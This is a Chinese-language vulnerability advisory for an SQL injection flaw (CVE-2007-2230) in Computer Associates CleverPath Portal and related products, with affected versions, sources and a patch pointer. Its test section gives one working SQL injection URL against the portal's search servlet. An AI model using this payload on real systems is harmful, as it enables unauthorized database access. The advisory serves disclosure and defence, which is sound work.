发布日期：2007-04-26
更新日期：2007-04-29

受影响系统：

Computer Associates eTrust Security Command Center r8
Computer Associates eTrust Security Command Center r1
Computer Associates Unicenter Management Portal 3.1
Computer Associates Unicenter Management Portal 2.0
Computer Associates Unicenter Management Portal 11.0
Computer Associates BrightStor Portal 11.1
Computer Associates CleverPath Portal r4.71
Computer Associates CleverPath Portal r4.7
Computer Associates CleverPath Portal r4.51
Computer Associates CleverPath Aion BPM r10.2
Computer Associates CleverPath Aion BPM r10.1
Computer Associates CleverPath Aion BPM r10
Computer Associates Unicenter Database Management Portal r11.1
Computer Associates Unicenter Database Management Portal r11
Computer Associates Unicenter Enterprise Job Manager 3
Computer Associates Unicenter Enterprise Job Manager 11
Computer Associates Unicenter Argis Portfolio Asset Management 11

描述：

---

BUGTRAQ  ID: 23671
CVE(CAN) ID: CVE-2007-2230

CleverPath Portal是一个安全、可扩展的企业信息门户，提供一个协作环境以及信息、应用和Web内容的整合视图。

CleverPath Portal在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞非授权访问数据库。

CleverPath Portal没有正确验证轻型搜索中的ofinterest参数及高级搜索中的description参数，如果攻击者修改了搜索URL中的上述参数的话，就可能导致发送非预期的数据库查询，检索整个数据库内容，具体取决于用户权限。

<*来源：Irene Abezgauz
  
  链接：http://secunia.com/advisories/25002/
        http://marc.info/?l=bugtraq&m=117743619517760&w=2
        http://marc.info/?l=bugtraq&m=117760291905454&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://foo.bar:fooport/servlet/portal/search/execute?CHARSET=UTF-8&showtemplate=false&OFINTEREST='%20and%20'a'<all(select%20table_name%20from%20iicolumns%20where%20table_name>'b')%20or%20'1'='1&showtemplate=false

建议：

---

厂商补丁：

Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://supportconnect.ca.com/

浏览次数：3019
严重程度：0（网友投票）